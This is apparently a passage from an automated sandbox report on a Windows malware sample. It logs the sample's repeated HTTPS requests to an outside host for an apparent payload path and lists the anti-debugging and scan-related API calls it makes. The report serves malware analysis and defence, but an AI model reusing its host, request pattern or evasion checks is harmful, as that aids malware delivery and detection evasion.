2024-11-26 07:13:53 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:53 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	50007	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:55 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:55 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:55 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:55 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	50012	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:57 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:57 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:57 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:57 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:57 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	50019	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:59 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:14:00 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:59 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:14:00 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	50024	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:14:01 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:14:02 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:14:01 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:14:02 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:14:02 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:14:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	50031	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:14:03 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:14:04 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:14:04 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:14:04 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	50033	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:14:05 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:14:06 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:14:06 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:14:06 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:14:06 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:14:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	50042	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:14:08 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:14:09 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:14:08 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:14:09 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	50046	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:14:10 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:14:11 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:14:11 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:14:11 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:14:11 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:14:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:12:06
Start date:	26/11/2024
Path:	C:\Users\user\Desktop\6BE4RDldhw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6BE4RDldhw.exe"
Imagebase:	0x400000
File size:	1'483'264 bytes
MD5 hash:	1A6538C76AE6EA94E5A6976ADF7DBD67
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	242
Total number of Limit Nodes:	9

Executed Functions

Function 02E8F7C4 Relevance: 227.8, APIs: 8, Strings: 117, Instructions: 9071
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InetIsOffline.URL(00000000,00000000,02E9B780,?,?,?,00000000,00000000), ref: 02E8F7FD

Part of subcall function 02E8F6E4: GetModuleHandleW.KERNEL32(KernelBase,?,02E8FAE7,UacInitialize,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanBuffer,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,Initialize), ref: 02E8F6EA
Part of subcall function 02E8F6E4: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02E8F6FC

Part of subcall function 02E8F740: GetModuleHandleW.KERNEL32(KernelBase), ref: 02E8F750
Part of subcall function 02E8F740: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E8F762
Part of subcall function 02E8F740: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E8F779

Part of subcall function 02E77E64: GetFileAttributesA.KERNEL32(00000000,?,02E9041B,ScanString,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,UacScan,02EF7380,02E9B7B4,UacInitialize), ref: 02E77E6F

